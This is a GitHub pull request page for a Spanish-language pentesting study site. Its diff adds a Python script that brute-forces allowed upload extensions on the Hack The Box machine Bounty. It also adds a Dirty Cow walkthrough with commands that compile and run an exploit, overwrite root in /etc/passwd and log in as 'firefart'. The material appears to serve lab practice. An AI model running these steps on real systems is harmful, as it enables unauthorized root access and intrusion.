Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Main #107

Open
wants to merge 1,698 commits into
base: master
Choose a base branch
from
Open

Main #107

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1698 commits
Select commit Hold shift + click to select a range
c10202b
Update estilos.css
F1r0x Aug 26, 2022
932cb5e
Update estilos.css
F1r0x Aug 26, 2022
398ac2b
Update estilosmenu.css
F1r0x Aug 26, 2022
599ed92
Update estilosmenu.css
F1r0x Aug 26, 2022
892497c
Update estilos.css
F1r0x Aug 26, 2022
1f7b7df
Update estilosmenu.css
F1r0x Aug 26, 2022
2a77176
Update estilosmenu.css
F1r0x Aug 26, 2022
69cdbaf
Update estilosmenu.css
F1r0x Aug 26, 2022
1b9adb4
Update estilosmenu.css
F1r0x Aug 26, 2022
712d0a6
Update estilosmenu.css
F1r0x Aug 26, 2022
78a16a6
Update estilosmenu.css
F1r0x Aug 26, 2022
306189a
Update estilosmenu.css
F1r0x Aug 26, 2022
1a016c4
Update portada.md
F1r0x Aug 26, 2022
3800aa5
Update estilosmenu.css
F1r0x Aug 26, 2022
27a461c
Update estilosmenu.css
F1r0x Aug 26, 2022
15f7bd4
Update estilosmenu.css
F1r0x Aug 26, 2022
ea9068f
Update estilosmenu.css
F1r0x Aug 26, 2022
a1e9fcf
Update estilosmenu.css
F1r0x Aug 26, 2022
cfdd163
Update estilosmenu.css
F1r0x Aug 26, 2022
6b23788
Update estilosmenu.css
F1r0x Aug 26, 2022
d3b9394
Update estilosmenu.css
F1r0x Aug 26, 2022
79ad034
Update estilosmenu.css
F1r0x Aug 26, 2022
37de733
Update estilosmenu.css
F1r0x Aug 26, 2022
79176dc
Update estilosmenu.css
F1r0x Aug 26, 2022
17dd80e
Update estilosmenu.css
F1r0x Aug 26, 2022
be316c4
Update estilosmenu.css
F1r0x Aug 26, 2022
50f2139
Update estilosmenu.css
F1r0x Aug 26, 2022
f56bf56
Update estilosmenu.css
F1r0x Aug 26, 2022
0923895
Update estilosmenu.css
F1r0x Aug 26, 2022
712d823
Update estilosmenu.css
F1r0x Aug 26, 2022
098c860
Update estilosmenu.css
F1r0x Aug 26, 2022
f7814c5
Update estilosmenu.css
F1r0x Aug 26, 2022
65e1388
Update estilosmenu.css
F1r0x Aug 26, 2022
e587109
Update estilosmenu.css
F1r0x Aug 26, 2022
457443f
Update estilosmenu.css
F1r0x Aug 26, 2022
4ae743f
Update estilosmenu.css
F1r0x Aug 26, 2022
1448a5c
Update estilosmenu.css
F1r0x Aug 26, 2022
0eee50a
Update estilosmenu.css
F1r0x Aug 26, 2022
aaff360
Update estilosmenu.css
F1r0x Aug 26, 2022
ce93dcd
Update estilosmenu.css
F1r0x Aug 26, 2022
f5792fa
Update estilosmenu.css
F1r0x Aug 26, 2022
97524b0
Update estilosmenu.css
F1r0x Aug 26, 2022
b8cc904
Update estilosmenu.css
F1r0x Aug 26, 2022
1b59e5c
Update estilosmenu.css
F1r0x Aug 26, 2022
ee31097
Update estilosmenu.css
F1r0x Aug 26, 2022
36c6d52
Update estilosmenu.css
F1r0x Aug 26, 2022
b0c1214
Update estilosmenu.css
F1r0x Aug 26, 2022
83f4144
Update estilosmenu.css
F1r0x Aug 26, 2022
8f34ff6
Update estilosmenu.css
F1r0x Aug 26, 2022
cd3935a
Update estilosmenu.css
F1r0x Aug 26, 2022
b46e171
Update estilosmenu.css
F1r0x Aug 27, 2022
06f4e65
Update estilosmenu.css
F1r0x Aug 27, 2022
032c589
Update estilosmenu.css
F1r0x Aug 27, 2022
e68e31d
Update portada.md
F1r0x Aug 27, 2022
13ed5b5
Update portada.md
F1r0x Aug 27, 2022
7c37aa1
Update estilosmenu.css
F1r0x Aug 27, 2022
ca7e983
Update estilosmenu.css
F1r0x Aug 27, 2022
2ca03be
Update portada.md
F1r0x Aug 27, 2022
14bfd31
Update estilosmenu.css
F1r0x Aug 27, 2022
320b393
Update estilosmenu.css
F1r0x Aug 27, 2022
7774535
Update estilosmenu.css
F1r0x Aug 27, 2022
f65d755
Update estilosmenu.css
F1r0x Aug 27, 2022
6e2831a
Update portada.md
F1r0x Aug 27, 2022
ff0e9af
Update portada.md
F1r0x Aug 27, 2022
b81025f
Update portada.md
F1r0x Aug 27, 2022
767307f
Update estilosmenu.css
F1r0x Aug 27, 2022
bbd0b26
Update estilosmenu.css
F1r0x Aug 27, 2022
4e46618
Update estilosmenu.css
F1r0x Aug 27, 2022
2d2d586
Update and rename portada.md to portada.html
F1r0x Aug 31, 2022
fe16c70
Update portada.html
F1r0x Aug 31, 2022
78ad695
Update jekyll-theme-hacker.scss
F1r0x Aug 31, 2022
6b400b1
Create cursolinux.html
F1r0x Aug 31, 2022
b573bf3
Update cursolinux.html
F1r0x Aug 31, 2022
0fe66f9
Create hola.md
F1r0x Aug 31, 2022
cd95c3e
Update cursolinux.html
F1r0x Aug 31, 2022
eb3540f
Update cursolinux.html
F1r0x Aug 31, 2022
d9ae44c
Update cursolinux.html
F1r0x Aug 31, 2022
40dd012
Update cursolinux.html
F1r0x Aug 31, 2022
8aeed20
Add files via upload
F1r0x Aug 31, 2022
f3b8138
Update cursolinux.html
F1r0x Aug 31, 2022
18e81d3
Update listarPrivilegiosLinux.md
F1r0x Aug 31, 2022
74edc81
Update cursolinux.html
F1r0x Aug 31, 2022
42a31ba
Update listarPrivilegiosLinux.md
F1r0x Aug 31, 2022
f9f124d
Update find.md
F1r0x Aug 31, 2022
08cd11f
Update find.md
F1r0x Aug 31, 2022
3ea7cc9
Update find.md
F1r0x Sep 1, 2022
ec6df8d
Update find.md
F1r0x Sep 1, 2022
684010d
Update find.md
F1r0x Sep 1, 2022
d74f46c
Update cursolinux.html
F1r0x Sep 1, 2022
351573a
Update portada.html
F1r0x Sep 1, 2022
9115162
Update portada.html
F1r0x Sep 1, 2022
c746656
Update Linux.md
F1r0x Sep 2, 2022
e93f260
Update cursolinux.html
F1r0x Sep 2, 2022
c45144c
Update cursolinux.html
F1r0x Sep 2, 2022
16da178
Update cursolinux.html
F1r0x Sep 2, 2022
e9ae182
Update portada.html
F1r0x Sep 2, 2022
5a4bd41
Update Windows.md
F1r0x Sep 2, 2022
e798127
Update portada.html
F1r0x Sep 3, 2022
5230e69
Add files via upload
F1r0x Sep 5, 2022
559f583
Update portada.html
F1r0x Sep 5, 2022
f46da84
Update cursolinux.html
F1r0x Sep 5, 2022
5ebd378
Add files via upload
F1r0x Sep 5, 2022
9546831
Update jekyll-theme-hacker.scss
F1r0x Sep 5, 2022
9b44e86
Delete videoprueba.mkv
F1r0x Sep 5, 2022
952236b
Delete estilosmenu.css
F1r0x Sep 5, 2022
69ed3ef
Update script.js
F1r0x Sep 5, 2022
bdb647e
Delete Cursos.md
F1r0x Sep 5, 2022
0b14374
Delete HTB.md
F1r0x Sep 5, 2022
a996407
Delete python.md
F1r0x Sep 6, 2022
7a26c2f
Delete ejpt.md
F1r0x Sep 6, 2022
7eaa848
Delete MarkDown.md
F1r0x Sep 6, 2022
636da10
Update hackthebox.html
F1r0x Sep 6, 2022
dd691e3
Add files via upload
F1r0x Sep 6, 2022
6528d63
Delete BufferOverflow.md
F1r0x Sep 6, 2022
5632ffa
Delete Artículos-HTB.md
F1r0x Sep 6, 2022
9a4d8c0
Delete BusquedaReporteArchivosLinux.md
F1r0x Sep 6, 2022
f39a570
Delete SQLinjection.md
F1r0x Sep 6, 2022
410fc49
Delete SSH.md
F1r0x Sep 6, 2022
dcb39d6
Update default_colors.scss
F1r0x Sep 6, 2022
70031b0
Update hackthebox.html
F1r0x Sep 6, 2022
6df4ad0
Delete tratamientoTTY.md
F1r0x Sep 6, 2022
3557421
Delete reverseShellCurl.md
F1r0x Sep 6, 2022
8ab67f5
Delete codigoFuenteTerminal.md
F1r0x Sep 6, 2022
1932456
Delete base64.md
F1r0x Sep 6, 2022
38751a9
Delete Telnet.md
F1r0x Sep 6, 2022
1d83d47
Delete Fase_de_reconocimiento-HTB.md
F1r0x Sep 6, 2022
8823784
Delete Como_conectarse_a_HTB.md
F1r0x Sep 6, 2022
dd26c9a
Actualización Prueba
F1r0x Sep 6, 2022
a5158c3
Update hola.md
F1r0x Sep 6, 2022
4425b64
hola modificado
F1r0x Sep 6, 2022
1057d76
Update hola.md
F1r0x Sep 6, 2022
67aca8b
Sep 7 12:29
F1r0x Sep 7, 2022
60cb452
Create robots.txt
F1r0x Sep 7, 2022
b848bc1
Sep 7 13:01
F1r0x Sep 7, 2022
f56f729
Update robots.txt
F1r0x Sep 7, 2022
e5d9287
Add files via upload
F1r0x Sep 7, 2022
57ce25e
Create sitemap.xml
F1r0x Sep 7, 2022
ceb6d59
Update robots.txt
F1r0x Sep 7, 2022
3740482
Update sitemap.xml
F1r0x Sep 7, 2022
84423e4
Sep 8 1:08
F1r0x Sep 7, 2022
c979855
Create aaaa.md
F1r0x Sep 7, 2022
45ec080
Update portada.html
F1r0x Sep 7, 2022
3159b39
Update aaaa.md
F1r0x Sep 8, 2022
0ab8bd4
Update aaaa.md
F1r0x Sep 8, 2022
dc3cfeb
Update aaaa.md
F1r0x Sep 8, 2022
22e4c41
Update aaaa.md
F1r0x Sep 8, 2022
3dd4c2d
Update aaaa.md
F1r0x Sep 8, 2022
0696a5c
Update aaaa.md
F1r0x Sep 8, 2022
9dbc3a5
Sep 8 13:03
F1r0x Sep 8, 2022
4bae53d
Sep 8 19:02
F1r0x Sep 8, 2022
29584b4
Sep 8 22:41
F1r0x Sep 8, 2022
81c257e
Update aaaa.md
F1r0x Sep 8, 2022
4b7d5a3
Update aaaa.md
F1r0x Sep 8, 2022
9698153
Update aaaa.md
F1r0x Sep 8, 2022
25b7512
Update aaaa.md
F1r0x Sep 8, 2022
f44ea5f
Sep 8 23:46
F1r0x Sep 8, 2022
8ec1b35
Update aaaa.md
F1r0x Sep 9, 2022
f10b4b1
Update aaaa.md
F1r0x Sep 9, 2022
3a27299
Update aaaa.md
F1r0x Sep 9, 2022
1853675
Update aaaa.md
F1r0x Sep 9, 2022
b9209f4
Update aaaa.md
F1r0x Sep 9, 2022
da7f03a
Update aaaa.md
F1r0x Sep 9, 2022
b6acb37
Update aaaa.md
F1r0x Sep 10, 2022
e0243a7
Sep 13 20:20
F1r0x Sep 13, 2022
874cc17
Update aaaa.md
F1r0x Sep 13, 2022
595f17a
Update aaaa.md
F1r0x Sep 13, 2022
45fc0d1
Sep 13 23:11
F1r0x Sep 13, 2022
2b6353e
Update aaaa.md
F1r0x Sep 13, 2022
057d8d7
Update aaaa.md
F1r0x Sep 13, 2022
35a8cab
Update aaaa.md
F1r0x Sep 13, 2022
5677dcc
Update aaaa.md
F1r0x Sep 13, 2022
788d8e1
Update aaaa.md
F1r0x Sep 13, 2022
05e0c2b
Update aaaa.md
F1r0x Sep 13, 2022
fa4495e
Update aaaa.md
F1r0x Sep 13, 2022
b1fb0c9
Update aaaa.md
F1r0x Sep 13, 2022
4fed52c
Update aaaa.md
F1r0x Sep 13, 2022
60ab2c0
Update aaaa.md
F1r0x Sep 13, 2022
14a3c8d
Sep 2:00
F1r0x Sep 14, 2022
5fe90f7
Sep 14 7:26
F1r0x Sep 14, 2022
28be25a
Update aaaa.md
F1r0x Sep 14, 2022
4e3e4a5
Update aaaa.md
F1r0x Sep 14, 2022
b78b520
Update aaaa.md
F1r0x Sep 14, 2022
efdbda3
Update aaaa.md
F1r0x Sep 14, 2022
48192f4
Update aaaa.md
F1r0x Sep 14, 2022
3c28fed
Update aaaa.md
F1r0x Sep 14, 2022
8d4d137
Update aaaa.md
F1r0x Sep 14, 2022
73b7efc
Update aaaa.md
F1r0x Sep 14, 2022
3ef5b27
Sep 12:16
F1r0x Sep 14, 2022
4f88732
Update aaaa.md
F1r0x Sep 15, 2022
edef17b
Update aaaa.md
F1r0x Sep 16, 2022
a45c8d4
Update aaaa.md
F1r0x Sep 16, 2022
7e00ef9
Update aaaa.md
F1r0x Sep 16, 2022
7969397
Sep 16 23:16
F1r0x Sep 16, 2022
28331ad
Sep 18 23:02
F1r0x Sep 18, 2022
d738b7c
Sep 18 23:45
F1r0x Sep 18, 2022
7c9e261
Update aaaa.md
F1r0x Sep 18, 2022
13bc4ac
Sep 19 0:22
F1r0x Sep 18, 2022
f51a59b
Update aaaa.md
F1r0x Sep 18, 2022
01cd71f
Update aaaa.md
F1r0x Sep 18, 2022
fccb9c2
Update aaaa.md
F1r0x Sep 18, 2022
212ea9f
Sep 21 13:11
F1r0x Sep 21, 2022
d85fc29
Update aaaa.md
F1r0x Sep 25, 2022
85b5946
Update aaaa.md
F1r0x Sep 25, 2022
3fb688a
Update aaaa.md
F1r0x Sep 25, 2022
3b74cb5
Update aaaa.md
F1r0x Sep 25, 2022
9e031d8
Update aaaa.md
F1r0x Sep 25, 2022
1a77e2d
Update aaaa.md
F1r0x Sep 25, 2022
dc9ff2c
Update aaaa.md
F1r0x Sep 25, 2022
f58ae71
Update aaaa.md
F1r0x Sep 25, 2022
a5340dc
Update aaaa.md
F1r0x Sep 25, 2022
63c4da5
Update aaaa.md
F1r0x Sep 27, 2022
7548a47
Update aaaa.md
F1r0x Sep 27, 2022
1120e16
Update aaaa.md
F1r0x Sep 28, 2022
b49a89a
Update aaaa.md
F1r0x Sep 28, 2022
870ab62
Update aaaa.md
F1r0x Sep 28, 2022
da87aa5
Update aaaa.md
F1r0x Sep 29, 2022
8ac9a45
Update aaaa.md
F1r0x Sep 29, 2022
282edad
Update aaaa.md
F1r0x Sep 29, 2022
bee4822
sep 30 1:35
invalid-email-address Sep 29, 2022
7a791c7
sep 30 5:18
invalid-email-address Sep 30, 2022
e55e642
Update aaaa.md
F1r0x Sep 30, 2022
8d33c08
Sep 30 22:58
Sep 30, 2022
d23deb5
Update aaaa.md
F1r0x Oct 1, 2022
d6f7e41
Update aaaa.md
F1r0x Oct 1, 2022
d2f8a75
Oct 2 6:19
Oct 2, 2022
1f686c2
Oct 2 7:08
Oct 2, 2022
6dfba15
Oct 2 7:20
Oct 2, 2022
1c7f383
Oct 2 20:01
Oct 2, 2022
f1145bc
Update aaaa.md
F1r0x Oct 2, 2022
2f2c577
Update aaaa.md
F1r0x Oct 2, 2022
11ac635
Update aaaa.md
F1r0x Oct 2, 2022
23ba147
Update aaaa.md
F1r0x Oct 2, 2022
5419d7d
Oct 3 23:05
Oct 3, 2022
8ec868f
Oct 3 23:32
Oct 3, 2022
b7ed805
Update aaaa.md
F1r0x Oct 4, 2022
91d7fdf
Update aaaa.md
F1r0x Oct 6, 2022
cffe76b
Update aaaa.md
F1r0x Oct 6, 2022
dd67a7a
Update aaaa.md
F1r0x Oct 7, 2022
3bf7c7c
Update aaaa.md
F1r0x Oct 7, 2022
1de0353
Update aaaa.md
F1r0x Oct 12, 2022
29dbcbd
Update aaaa.md
F1r0x Oct 12, 2022
24d8b22
Update aaaa.md
F1r0x Oct 12, 2022
75774ab
Update aaaa.md
F1r0x Oct 12, 2022
5fc8947
Update aaaa.md
F1r0x Oct 12, 2022
26e9104
Oct 13 0:17
Oct 12, 2022
da98551
Oct 13 1:04
Oct 12, 2022
14ce899
Oct 13 1:10
Oct 12, 2022
413ea0d
Update cursolinux_1.html
F1r0x Oct 18, 2022
e019c39
Rename Web/aaaa.md to Web/Maquinas-HTB/aaaa.md
F1r0x Nov 29, 2022
2130d38
Rename Web/Maquinas-HTB/aaaa.md to Maquinas-HTB/aaaa.md
F1r0x Nov 29, 2022
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
50 changes: 50 additions & 0 deletions Exploits/BountyHTBnumerationExtension/BountyNumExtensionHTB.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
#!/usr/bin/python3

from pwn import *
import signal, time, pdb, sys, requests

def def_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

# Variabls globales
transfer_url = "http://10.10.10.93/transfer.aspx" # Ip de la máquina
burp = {'http': 'http://127.0.0.1.:8080'} # Conexión con Burbsuite

def uploadFile(extension):

s = requests.session()
r = s.get(transfer_url)

viewState = re.findall(r'id="__VIEWSTATE" value="(.*?)"', r.text)[0]
eventValidation = re.findall(r'id="__EVENTVALIDATION" value="(.*?)"', r.text)[0]

post_data = {
'__VIEWSTATE': viewState,
'__EVENTVALIDATION': eventValidation,
'btnUpload': 'Upload'
}

fileUploaded = {'FileUpload1': ('Prueba%s' % extension, 'Esto es una prueba')}

r = s.post(transfer_url, data=post_data, files=fileUploaded) # Para añadir conexión con Burpsuite incluir ", proxies=burp"

if "Invalid File. Please try again" not in r.text:
log.info("La extensión %s es valida" % extension)

if __name__ == '__main__':

f = open("/usr/share/seclists/Discovery/Web-Content/raft-medium-extensions.txt","rb")

p1 = log.progress("Fuerza bruta")
p1.status("Iniciando ataque de fuerza bruta")

for extension in f.readlines():
extension = extension.decode().strip()
p1.status("Probando con la extensión %s" % extension)
uploadFile(extension)

uploadFile()
7 changes: 7 additions & 0 deletions Exploits/BountyHTBnumerationExtension/Readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
# HTB Bounty - Numeracion de extensiones.

Este exploit se utiliza para numerar las extensiones que interpreta un sistema. El programa este ha sido crado para
la máquina Bounty de Hack The Box. Usando un diccionario de extensiones las comprueba todas reportándonos cuáles
podemos utilizar.

![Captura de pantalla 2022-08-05 021242](https://user-images.githubusercontent.com/103068924/182975843-e3b63a68-bbaf-42bc-9ef1-6e16616f740a.png)
151 changes: 151 additions & 0 deletions Exploits/DirtyCow/DirtyCow.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,151 @@
# Dirty Cow - EDB-ID:40839


* <a href="#item1" style="text-decoration:none">¿Qué es Dirty Cow?</a>
* <a href="#item2" style="text-decoration:none">¿Cómo explotar la vulnerabilidad Dirty Cow?</a>
* <a href="#item3" style="text-decoration:none">Como saber que un equipo posee la vulnerabilidad Dirty Cow.</a>
* <a href="#item4" style="text-decoration:none">Instalación del Exploit.</a>
* <a href="#item5" style="text-decoration:none">Ejecución del Exploit.</a>


<a name="item1"></a>
## ¿Qué es Dirty Cow?


Dirty Cow (Dirty copy-on-write) es una vulnerabilidad de seguridad informática para el kernel de Linux que afectó a todos los
sistemas operativos basados en Linux, incluidos los dispositivos Android, que usaban versiones anteriores del kernel de Linux
creadas antes de 2018.


Concretamente, afecta a las versiones desde la 2.6.22 hasta la 3.9 del kernel de Linux.


<a name="item2"></a>
## ¿Cómo explotar la vulnerabilidad Dirty Cow?


Este exploit escrito en `C`, utiliza el exploit `pokemon` de la vulnerabilidad Dirty Cow.


El exploit aprovecha una vulnerabilidad en el código del kernel de Linux a través del cual genera automáticamente una nueva línea `passwd`(/etc/passdw).


Se le pedirá al usuario la nueva contraseña cuando se ejecute el binario.


A continuación, se realiza una copia de seguridad del archivo `/etc/passwd` original en `/tmp/passwd.bak` y sobrescribe la cuenta raíz con la
línea generada. Esto podemos comprobarlo haciendo un `cat` en el archivo `passwd`:


cat /etc/passwd

![Captura de pantalla 2022-08-04 031357](https://user-images.githubusercontent.com/103068924/182746135-250eed29-7793-471c-b274-043ae2f88f84.png)


Después de ejecutar el exploit, debería poder iniciar sesión con el usuario recién originado. Por defecto se creará el Usurio `firefart`. Podemos
cambiar el nombre dentro del exploit y proporcionarle el que queramos.


![Captura de pantalla 2022-08-04 031524](https://user-images.githubusercontent.com/103068924/182746181-88bf1e37-8627-4a38-89b1-373d990b9a76.png)


![Captura de pantalla 2022-08-04 031701](https://user-images.githubusercontent.com/103068924/182746205-34d43fb9-5c48-4270-b1ac-3a9d121d9950.png)


Exploit original: https://www.exploit-db.com/exploits/40839


Exploit en mi repositorio GitHub: https://github.com/F1r0x/f1r0x.github.io/blob/main/Exploits/DirtyCow/dirty.c


<a name="item3"></a>
## Como saber que un equipo posee la vulnerabilidad Dirty Cow:


Básicamente, para comprobar si un sistema Linux es vulnerable al Dirty Cow es revisando la versión del kernel. Si la versión del kernel está entre
la 2.6.22 hasta la 3.9 es muy posible que sea vulnerable. Para comprobar la versión del kernel podemos utilizar el comando:


uname -a

![Captura de pantalla 2022-08-04 034452](https://user-images.githubusercontent.com/103068924/182746307-77b0b46f-f8d8-4e39-aed7-209f7b32bb63.png)


<a name="item4"></a>
## Instalación del exploit:


Para instalar el exploit, primero debemos tener acceso al sistema y poder descargar el binario en el equipo víctima, podemos descargarlo desde
el repositorio original o desde GitHub si nos permite realizar un `git clone` o podemos copiarlo directamente desde el buscador y crear el
archivo (mediante `nano` por ejemplo).


* <a href="./dirty.c" style="text-decoration:none">Copiar de Aquí.</a>


Podemos crear el archivo `dirty.c` utilizado `nano` y pegar el código del exploit.


Una vez descargado o creado lo debemos compilar con:


gcc -pthread dirty.c -o dirty -lcrypt

![Captura de pantalla 2022-08-04 031828](https://user-images.githubusercontent.com/103068924/182746374-e0239b7d-abe1-488e-a469-f67706a5317c.png)


<a name="item5"></a>
## Ejecución del Exploit:


Ahora para ejecutar el binario utilizamos el siguiente comando:


./dirty

![Captura de pantalla 2022-08-04 031905](https://user-images.githubusercontent.com/103068924/182746270-b2880a65-5126-47c8-8aea-48ab48177e8c.png)

Tras ejecutarlo nos pedirá que ingresemos una nueva contraseña.

Finalmente, una vez generada la nueva contraseña, se alojará el nuevo usuario en el `/etc/passwd` y podremos ingresar como ese usuario
el cual tendrá privilegios de superusuario o `root`.

Para acceder al usuario:

su firefart

* `firefart`: Es el usuario predeterminado del exploit.

Para acceder a través de un servicio `ssh`:

ssh firefart@[Ip Vícitma]


---
---


<html lang="en">
<head>

</head>
<body>


<script src="https://utteranc.es/client.js"
repo="F1r0x/gestion-comentarios"
issue-term="pathname"
theme="github-light"
crossorigin="anonymous"
async>
</script>


</body>
</html>


---
---


Loading